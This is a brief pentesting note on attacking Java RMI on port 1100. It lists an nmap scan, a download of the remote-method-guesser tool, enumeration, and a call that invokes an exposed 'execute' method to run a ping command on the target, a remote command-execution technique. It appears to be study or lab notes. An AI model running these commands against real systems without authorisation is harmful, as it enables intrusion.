1100 - Pentesting mssql rmi java

nmap

nmap -p 1100 -Pn -sC -sV $IP
1100/tcp  open  java-rmi     Java RMI

Remote Method Guesser

wget https://github.com/qtc-de/remote-method-guesser/releases/download/v4.3.1/rmg-4.3.1-jar-with-dependencies.jar -O /opt/tools/rmg.jar

java -jar /opt/tools/rmg.jar enum $IP 1100
java -jar /opt/tools/rmg.jar call $IP 1100 '"ping -c 10 192.168.119.199"' --signature 'String execute(String cmd)' --bound-name plain-server